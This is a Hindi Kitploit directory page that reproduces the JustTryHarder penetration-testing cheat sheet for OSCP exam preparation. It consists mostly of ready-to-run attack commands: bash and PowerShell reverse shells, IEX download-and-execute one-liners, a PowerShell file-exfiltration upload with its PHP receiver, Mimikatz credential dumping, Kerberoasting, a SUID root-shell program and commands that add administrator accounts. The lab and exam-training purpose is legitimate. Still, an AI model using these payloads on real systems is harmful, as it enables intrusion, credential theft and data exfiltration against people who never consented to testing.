Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
JustTryHarder — पीडब्ल्यूके/ओएससीपी परीक्षा की तैयारी के लिए व्यापक पेनिट्रेशन टेस्टिंग चीट शीट, जिसमें विशेषाधिकार वृद्धि, पासवर्ड क्रैकिंग, पेलोड जनरेशन, पोस्ट-एक्सप्लॉइटेशन, पोर्ट स्कैनिंग, वेब हमले और रिकॉनिसेंस तकनीकें शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/sinfulz/justtryharder
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीपेलोड जनरेशनपोर्ट स्कैनिंगशोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsinfulz/justtryharder

JustTryHarder

83610652 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पीडब्ल्यूके/ओएससीपी परीक्षा की तैयारी के लिए व्यापक पेनिट्रेशन टेस्टिंग चीट शीट, जिसमें विशेषाधिकार वृद्धि, पासवर्ड क्रैकिंग, पेलोड जनरेशन, पोस्ट-एक्सप्लॉइटेशन, पोर्ट स्कैनिंग, वेब हमले और रिकॉनिसेंस तकनीकें शामिल हैं।

रिपॉजिटरी देखें

JustTryHarder

JustTryHarder एक चीट शीट है जो PWK कोर्स और OSCP परीक्षा में आपकी सहायता करेगी।

(PayloadAllTheThings से प्रेरित)

बेझिझक एक Pull Request सबमिट करें और अगर इससे आपको मदद मिली हो तो थोड़ा प्यार दिखाने के लिए एक स्टार छोड़ें। 💖

Hacktoberfest के अनुकूल! हाँ, हम Hacktoberfest के लिए Pull Requests के लिए खुले हैं! कृपया सुनिश्चित करें कि यह स्पैम न हो और वास्तव में इस रेपो में अच्छा योगदान दे। धन्यवाद और हैप्पी हैकिंग!

अस्वीकरण: नीचे दी गई कोई भी जानकारी PWK लैब्स / OSCP परीक्षा के स्पॉइलर नहीं है।

क्रेडिट जानकारी

मैंने इस जानकारी का अधिकांश भाग अन्य Github रेपो, ब्लॉग, साइटों और अधिक से प्राप्त किया है। मैंने मूल निर्माता को जितना संभव हो उतना श्रेय देने का प्रयास किया है। यदि मैंने आपको श्रेय नहीं दिया है, तो कृपया मुझसे ट्विटर पर संपर्क करें: https://twitter.com/s1nfulz

विषय सूची

  • पिंग के माध्यम से होस्ट के OS का निर्धारण
  • BOF (WIP)
  • ब्रेकआउट / एनवायरनमेंट एस्केप
  • DNS - जोन ट्रांसफर
  • फ़ाइल ट्रांसफर
  • केरबेरोस्टिंग
  • LFI / RFI
  • MSSQL / SQLi
  • पासवर्ड क्रैकिंग
  • पासवर्ड स्प्रेइंग (CrackMapExec)
  • पेलोड जनरेशन
  • PHP
  • प्रिव एस्क - लिनक्स
  • प्रिव एस्क - विंडोज
  • पोस्ट एक्सप्लॉइटेशन
  • पोर्ट फ़ॉरवर्डिंग
  • सॉक्स प्रॉक्सी (पावरशेल का उपयोग करके)
  • पोर्ट स्कैनिंग
  • पिंग स्वीप
  • पिवोटिंग
  • रिमोट डेस्कटॉप
  • रिस्पॉन्डर
  • रिवर्स शेल
  • शेल अपग्रेडिंग
  • SQL इंजेक्शन (SQLmap)
  • सुनने वाले पोर्ट दिखाएँ
  • SMB - गणना
  • SMB - इम्पैकेट
  • SMTP गणना
  • ICMP इंजेक्शन
  • VMware (पूर्ण स्क्रीन नहीं जाना)
  • वेब सर्वर
  • वेब स्कैनिंग
  • वेब शेल
  • वर्डप्रेस
  • विंडोज फ्रेमवर्क / पावरशेल
  • विंडोज पोस्ट एक्सप्लॉइटेशन कमांड
  • लिखने योग्य निर्देशिकाएँ
  • करने की सूची
  • धन्यवाद

पिंग के माध्यम से होस्ट के OS का निर्धारण```bash

ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

root@kitploit:~
`TTL` का उपयोग होस्ट के OS का पता लगाने के लिए किया जा सकता है। TTL के तीन अलग-अलग प्रकार नीचे दिखाए गए हैं:

  - **TTL=64** = \*nix - हॉप काउंट; इसलिए यदि आप 61 प्राप्त कर रहे हैं, तो 3 हॉप्स हैं और यह एक \*nix उपकरण है। सबसे अधिक संभावना लिनक्स है।
  - **TTL=128** = विंडोज़ - फिर से, यदि TTL 127 है तो हॉप 1 है और यह एक विंडोज़ बॉक्स है।
  - **TTL=254** = Solaris/AIX - यदि TTL 250 है तो हॉप काउंट 4 है और यह एक Solaris बॉक्स है।

## BOF (कार्य प्रगति पर)

(सामान्य खराब वर्णों में शामिल हैं: `0x00`, `0x0A`, `0x0D`)

  - फ़ज़िंग
  - EIP की स्थिति ढूँढना
  - खराब वर्ण ढूँढना
  - `jmp esp` का पता लगाना
  - `msfvenom` के साथ पेलोड उत्पन्न करना
  - `netcat` के साथ रिवर्स शेल प्राप्त करना

**अच्छे BOF संसाधन:**

  - [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
  - [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
  - [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
  - [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)

## ब्रेकआउट / एनवायरनमेंट एस्केप

  - [Pentest Partners - सिट्रिक्स से बाहर निकलना](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
  - [SRA.io - SiteKiosk ब्रेकआउट](https://sra.io/blog/sitekiosk-breakout/)
  - [TrustedSec - किओस्क/POS ब्रेकआउट कीज़](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
  - [Cognosec - सिट्रिक्स एनवायरनमेंट से बाहर निकलना](https://cognosec.com/breaking-out-of-citrix-environment/)
  - [NetSPI - एप्लिकेशन से बाहर निकलना](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
  - [NCC Group - एनवायरनमेंट ब्रेकआउट के साथ सामान्य समस्याएं (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
  - [GracefulSecurity - सिट्रिक्स ब्रेकआउट](https://gracefulsecurity.com/citrix-breakout/)

## DNS - ज़ोन ट्रांसफ़र```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## फ़ाइल स्थानांतरण

### SMB स्थानांतरण

पीड़ित मशीन पर (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget स्थानांतरण

होस्ट से फ़ाइल(फ़ाइलें) कैसे प्राप्त करें (रिवर्स शेल के अंदर).

**सेटअप:** जिस फ़ाइल को आप स्थानांतरित करना चाहते हैं उसे `/var/www/html/` में रखें और `service apache2 start` चलाएँ।

रिमोट सर्वर पर चलाएँ:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64)       # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/)   # <- for folder
```
### TFTP स्थानांतरण

(Kali से Windows में स्थानांतरण कैसे करें)

**MSF का उपयोग करके:**
इन चरणों से पहले MSF प्रारंभ करें:

1.  `use auxiliary/server/tftp`
2.  `set TFTPROOT /usr/share/mimikatz/Win32/`
3.  `run`

**टर्मिनल के अंदर:**
4\. `tftp -i 10.10.10.10 GET mimikatz.exe`

### NetCat (Windows से Kali)

1.  **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2.  **Linux:** `nc -nlvp 4444 > bank-account.zip`

### PowerShell

इंटरैक्टिव सत्र:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
बिना किसी इंटरैक्टिव PowerShell सत्र के (`wget.ps1` बनाएं):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -\> Linux)

**स्थानीय होस्ट:**

1.  `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2.  `encoded.b64` को `nc` या अन्य माध्यम से रिमोट सर्वर पर स्थानांतरित करें।

**रिमोट सर्वर - लिनक्स:**
3\. `cat /path/to/encoded.b64 | base64 -d > exploit.py`

### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### HTTP File Upload (Exfiltration)

**1. upload.php बनाएँ**
हमलावर मशीन की webroot में बनाएँ (`/var/www/html` डिफ़ॉल्ट रूप से).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. निर्देशिका बनाएँ**
अपलोड निर्देशिका बनाएँ और अपलोड की अनुमति देने के लिए उचित अनुमतियाँ सेट करें।```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. फ़ाइल अपलोड करें**
PowerShell का उपयोग करके पीड़ित मशीन से हमला करने वाली मशीन पर फ़ाइल अपलोड करें:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting

  - `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
  - `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
  - `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`

## LFI / RFI

**PHP Reverse Shell:**```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
```
**कमांड इंजेक्शन:**```php
<?php echo shell_exec(whoami);?>
```
## MSSQL / SQLi

  - `EXEC master..xp_cmdshell 'whoami';`
  - `' exec master..xp_cmdshell 'whoami' --`
  - [OSCP-2 SQL Injection Cheatsheet](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md)
  - [PentestMonkey SQL Injection](http://pentestmonkey.net/category/cheat-sheet/sql-injection)

## पासवर्ड क्रैकिंग

**Hashcat**```bash
hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt
```
**John The Ripper**```bash
john --rules --wordlist=/path/to/your/wordlist.txt hash.txt
```
## पासवर्ड स्प्रेइंग (CrackMapExec)```bash
cme smb 10.10.10.10 -u username -d domain -p password
```
## पेलोड जनरेशन

  - [NETSEC - पेलोड बनाना](https://netsec.ws/?p=331)
  - [MsfVenom चीटशीट](https://www.google.com/search?q=http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)
  - [Metasploit Unleashed Payloads](https://www.offensive-security.com/metasploit-unleashed/payloads/)
  - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

**प्रकार:**

  - नॉन-स्टेज्ड: `netcat`
  - स्टेज्ड: `multi/handler`

## PHP

  - [exec(), shell\_exec, system() और passthru() फ़ंक्शंस के बीच अंतर](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)

## विशेषाधिकार वृद्धि - लिनक्स

**नोट:** यदि GCC और wget स्थापित हैं, तो सिस्टम कर्नेल एक्सप्लॉइट के प्रति संवेदनशील हो सकता है।

  - [लिनक्स कर्नेल एक्सप्लॉइट्स](https://github.com/SecWiki/linux-kernel-exploits)
  - [GTFObins - प्रतिबंधित शेल से बाहर निकलें](https://gtfobins.github.io)
      - GTFO हेल्पर स्क्रिप्ट: [https://github.com/dreadnaughtsec/gtfo](https://github.com/dreadnaughtsec/gtfo)
  - [लिनक्स एक्सप्लॉइट सुझावक](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
  - [लिनक्स एक्सप्लॉइट सुझावक 2](https://github.com/jondonas/linux-exploit-suggester-2)
  - [बुनियादी लिनक्स विशेषाधिकार वृद्धि](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

**गणना आदेश:**```bash
grep -Ri 'password' .
find / -perm –4000 2>/dev/null
find / -perm -u=s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
# (then ls -la, look for 777 file permissions)
```
**कस्टम SUID बाइनरी:**
लक्ष्य उपयोगकर्ता के रूप में कोड निष्पादन की आवश्यकता है। उदाहरण: mysql sys\_eval as root.```c
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>

int main(){
    setuid(geteuid());
    system("/bin/bash");
    return 0;
}
```
## Priv Esc - विंडोज

  - [विंडोज विशेषाधिकार वृद्धि मूल बातें](http://www.fuzzysecurity.com/tutorials/16.html)
  - [विंडोज विशेषाधिकार वृद्धि गाइड](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
  - [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
  - [Powerless - गणना उपकरण](https://github.com/M4ximuss/Powerless)
  - [स्थानीय विशेषाधिकार वृद्धि कार्यशाला](https://github.com/sagishahar/lpeworkshop)
  - [एक और विंडोज (गणना) स्क्रिप्ट / JAWS](https://github.com/411Hall/JAWS)
  - [Watson](https://github.com/rasta-mouse/Watson)
  - [Sherlock (पदावनत)](https://github.com/rasta-mouse/Sherlock)
  - [विंडोज एक्सप्लॉइट सुझावक](https://github.com/GDSSecurity/Windows-Exploit-Suggester)

**कमांड:**

  - `churrasco -d "net user /add <username> <password>"`
  - `churrasco -d "net localgroup administrators <username> /add"`
  - `churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"`

## पोस्ट एक्सप्लॉइटेशन

1.  `Mimikatz.exe` (इसे चलाएं)
2.  `privilege::debug`
3.  `sekurlsa::logonpasswords`

## पोर्ट फॉरवर्डिंग

> **स्थानीय:** स्थानीय पोर्ट को रिमोट होस्ट पर अग्रेषित करें।
> स्थानीय का उपयोग करें यदि आपके पास एक मशीन पर चल रही सेवा है जिसे रिमोट मशीन से पहुंचा जा सकता है, और आप इसे सीधे स्थानीय मशीन से एक्सेस करना चाहते हैं।
>
> **रिमोट:** रिमोट पोर्ट को स्थानीय होस्ट पर अग्रेषित करें।
> रिमोट का उपयोग करें यदि आपके पास एक सेवा है जिसे स्थानीय मशीन से पहुंचा जा सकता है, और आपको इसे रिमोट मशीन के लिए उपलब्ध कराने की आवश्यकता है। यह उस मशीन पर सुनने वाला सॉकेट खोलता है जिसमें आपने SSH के माध्यम से लॉग इन किया है।
>
> **डायनामिक:** SOCKS का उपयोग करें।
> डायनामिक स्थानीय की तरह है, लेकिन क्लाइंट पक्ष पर यह SOCKS प्रॉक्सी की तरह व्यवहार करता है। इसका उपयोग करें यदि आपको किसी सॉफ़्टवेयर से कनेक्ट करने की आवश्यकता है जो SOCKS फॉरवर्डिंग की अपेक्षा करता है।

### चिसेल

**स्थानीय सिस्टम:**```bash
./chisel server -p 8080 --reverse
```
**पीड़ित:**```bash
./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234
```
### SSH

1.  **एक SSH कुंजी युग्म उत्पन्न करें** पिवोट किए जा रहे बॉक्स पर अपने क्रेडेंशियल्स की सुरक्षा के लिए।

<!-- end list -->```bash
ssh-keygen
cat ~/.ssh/id_rsa.pub
```
2.  **सार्वजनिक कुंजी कॉपी करें**. यह मान और पिवट मशीन का IP पता अपने हमला करने वाली (Kali) मशीन पर `~/.ssh/authorized_keys` फ़ाइल में नीचे दिए गए सिंटैक्स का उपयोग करके जोड़ें।

<!-- end list -->```
from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]
```
3.  **सुनिश्चित करें कि SSH सेवा चल रही है** आपकी हमला करने वाली (Kali) मशीन पर।

<!-- end list -->```bash
sudo service ssh start
```
4.  **SSH कॉल प्रारंभ करें** उस बॉक्स से जिसके माध्यम से पिवोट किया जा रहा है और चरण 1 में उत्पन्न `id_rsa` प्राइवेट कुंजी निर्दिष्ट करें।

<!-- end list -->```bash
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]
```
5.  **अपना proxychains config संपादित करें**: `/etc/proxychains.conf`

<!-- end list -->```
socks4 127.0.0.1 1080
```
6.  **proxychains चलाएं**. `nmap` से स्कैन करते समय, TCP Connect scans का उपयोग सुनिश्चित करें।

<!-- end list -->```bash
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10
```
**अतिरिक्त नोट्स:**

  - `ssh [email protected] -R 1234:127.0.0.1:1234`
  - `ssh -D 1337 -q -C -N -f [email protected]` ([स्रोत](https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters))

## Socks Proxy (PowerShell का उपयोग करके)

**स्थानीय:**

  - `vi /etc/proxychains.conf` -\> `socks5 <ip> 9080`
  - `Import-Module .\Invoke-SocksProxy.psm1`
  - `Invoke-SocksProxy -bindPort 9080`
  - `proxychains nmap -sT <ip>`

## पोर्ट स्कैनिंग

### TCP```bash
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
nmap -sT -p 22,80,110 -A
nmap -p- -iL ips.txt > TCP_Ports.txt
nc -v -n -z -w1 10.10.10.10 1-10000
nmap -p- -iL ips.txt > AllTCPPorts.txt
```
### UDP

(इसमें घंटों लग सकते हैं, यदि आपके पास shell है तो `netstat` एक बेहतर विकल्प है।)```bash
nmap -sU --top-ports 10000
nmap -sT -sU -p 22,80,110 -A
nmap -sT -sU -p- --min-rate 2000
nmap -p- -sU -iL ips.txt > udp.txt
nmap -sU -sV -iL ips.txt > alludpports.txt
```
### अन्य प्रोटोकॉल

**SNMP:**
`nmap -p161 -sU -iL ips.txt > udp.txt`

**SSH:**
`nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt`

**SSL:**
`nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt`

**NMAP Bootstrap रिपोर्ट:**```bash
nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl
```
## पिंग स्वीप

### Linux (एक-लाइनर्स)```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
fping -g 192.168.0.1/24
```
### Linux (स्क्रिप्ट)```bash
for i in `seq 1 255`
do
    ping -c1 192.168.125.$i 2>/dev/null 1>&2
    if [[ $? -eq 0 ]]
    then
        echo 192.168.125.$i is up
    fi
done
```
### Windows (CMD)```cmd
for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.
```
### विंडोज़ (PowerShell)```powershell
$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * }
```
### Nmap```bash
nmap -sP 192.168.0.1-254
```
## पिवटिंग

  - `sshuttle -r [email protected] 10.1.1.0/24`

## रिमोट डेस्कटॉप

  - `rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/`
  - `xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore`

## रिस्पॉन्डर

  - `responder -I tun0 -wrF`
  - [Responder with NTLM Relay and Empire](https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html)
  - [Practical Guide to NTLM Relaying](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)

## रिवर्स शेल्स

**लिनक्स:**

  - [PentestMonkey - Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
  - [Awansec - Reverse Shell](https://awansec.com/reverse-shell.html)
  - [RevShells.com](https://www.revshells.com/)

**विंडोज़:**

  - [GitHub - Windows PHP Reverse Shell](https://github.com/Dhayalanb/windows-php-reverse-shell)
  - `nc 10.10.10.10 4444 –e cmd.exe`

## शेल अपग्रेड करना

स्रोत: [Ropnop Blog](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) & [HTB Forum](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)

### पायथन

1.  `python -c 'import pty;spawn("/bin/bash");'` या `python3 -c 'import pty;spawn("/bin/bash");'`
2.  रिवर्स शेल में:

<!-- end list -->```bash
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
```
3.  Kali में:

<!-- end list -->```bash
stty raw -echo
fg
```
4.  reverse shell में:

<!-- end list -->```bash
reset # (sometimes optional)
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols> # (optional)
```
### Socat का उपयोग करना

**श्रोता:**```bash
socat file:`tty`,raw,echo=0 tcp-listen:4444
```
**पीड़ित:**```bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
### Perl

1.  `perl -e 'exec "/bin/sh";'`
2.  `perl: exec "/bin/sh";`

### Bash

`/bin/sh -i`

## SQL Injection (SQLmap)```bash
sqlmap -u "[http://example.com/test.php?test=test](http://example.com/test.php?test=test)" --level=5 --risk=3 --batch
```
## सुनने वाले पोर्ट दिखाएँ

**Linux netstat:**
`netstat -tulpn | grep LISTEN`

**FreeBSD/MacOS X netstat:**
`netstat -anp tcp | grep LISTEN`
`netstat -anp udp | grep LISTEN`

**OpenBSD netstat:**
`netstat -na -f inet | grep LISTEN`
`netstat -nat | grep LISTEN`

**Nmap स्कैन:**
`sudo nmap -sT -O localhost`
`sudo nmap -sU -O 192.168.2.13` (UDP)
`sudo nmap -sT -O 192.168.2.13` (TCP)

## SMB - गणना

  - [0xdf - SMB गणना चेकलिस्ट](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html)
  - `smbmap -H 10.10.10.10`
  - `smbclient -L 10.0.0.10`
  - `smbclient //10.10.10.10/share$`

## SMB - Impacket

**Impacket का PSEXEC** (एक रिमोट पोर्ट फॉरवर्ड बनाने के बाद):```bash
/usr/share/doc/python-impacket/examples/psexec.py [email protected]
# Password: (password)
# [*] Trying protocol 445/SMB...
```
**इम्पैकेट का SMBServer** (फ़ाइल स्थानांतरण के लिए):

1.  `cd /usr/share/windows-binaries`
2.  `python /usr/share/doc/python-impacket/examples/smbserver.py a .`
3.  `\\10.10.10.10\a\mimikatz.exe`

## SMTP गणना

  - [SMTP कमांड](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt)

## ICMP इंजेक्शन

1.  `ping -n 3 10.10.10.10`
2.  `tcpdump -i tun0 icmp`

## VMware (पूर्ण स्क्रीन नहीं जा रहा)

`systemctl restart open-vm-tools.service`

## वेब सर्वर

  - `python -m SimpleHTTPServer 80`
  - `python3 -m http.server 80`
  - `ngrok http "file:///C:\Users\sinfulz\Public Folder"`
  - `php -S 0.0.0.0:80`

## वेब स्कैनिंग

**GoBuster (Linux/Apache):**```bash
gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
```
**GoBuster (Windows/IIS):**```bash
gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
```
**Dirsearch (Linux/Apache):**```bash
python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
```
**Dirsearch (Windows/IIS):**```bash
python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50
```
**अन्य GoBuster:**

  - HTTP: `gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69`
  - HTTPS: `gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69`

**Nikto:**

  - HTTP: `nikto -h 10.10.10.10 -p 80`
  - HTTPS: `nikto -h 10.10.10.10 -p 443`

**WFuzz:**```bash
wfuzz -u [http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00](http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00) -w /usr/share/wfuzz/wordlist/general/common.txt
```
## वेब शेल्स

  - [PHPBash](https://github.com/Arrexel/phpbash)
  - [p0wny-shell](https://github.com/flozz/p0wny-shell)

## WordPress

  - [Top Hat Sec - WP](https://forum.top-hat-sec.com/index.php?topic=5758.0)

## Windows Framework / Powershell

**PowerShell निष्पादन नीति को बायपास करें:**```powershell
powershell -ExecutionPolicy ByPass -File script.ps1
```
**Resources:**

  - [Nishang](https://github.com/samratashok/nishang)
  - [Sherlock](https://github.com/rasta-mouse/Sherlock)

**Reverse PowerShell:**
(कभी-कभी स्ट्रिंग के सामने powershell या echo की आवश्यकता हो सकती है, या उद्धरण का उपयोग किया जा सकता है।)```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
**PowerUp (स्थानीय वेब सर्वर से):**```powershell
echo IEX(New-Object Net.WebClient).DownloadString('[http://10.10.10.10:80/PowerUp.ps1](http://10.10.10.10:80/PowerUp.ps1)') | powershell -noprofile -
```
या```powershell
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('[http://10.10.14.](http://10.10.14.)x/Whatever.ps1'); Invoke-Whatever"
```
**MSSQL का उपयोग करके रिवर्स पावरशेल:**```sql
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"[http://10.10.10.10/Nishang-ReverseShell.ps1](http://10.10.10.10/Nishang-ReverseShell.ps1)\")
```
**PowerShell के साथ फ़ाइल स्थानांतरण:**```powershell
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')
```
## विंडोज़ पोस्ट-एक्सप्लॉइटेशन कमांड्स```cmd
WMIC USERACCOUNT LIST BRIEF
net user
net localgroup Users
net localgroup Administrators
net user USERNAME NEWPASS /add
net user "USER NAME" NEWPASS /add
net localgroup administrators USERNAME /add
```
## लिखने योग्य निर्देशिकाएँ

### विंडोज़

(स्रोत: [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md))
निम्नलिखित फ़ोल्डर डिफ़ॉल्ट रूप से सामान्य उपयोगकर्ताओं द्वारा लिखने योग्य होते हैं (OS संस्करण के अनुसार भिन्न होता है)।```
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```
### Linux

लिनक्स में वर्ल्ड राइटेबल डायरेक्टरीज़ ढूंढने के लिए:```bash
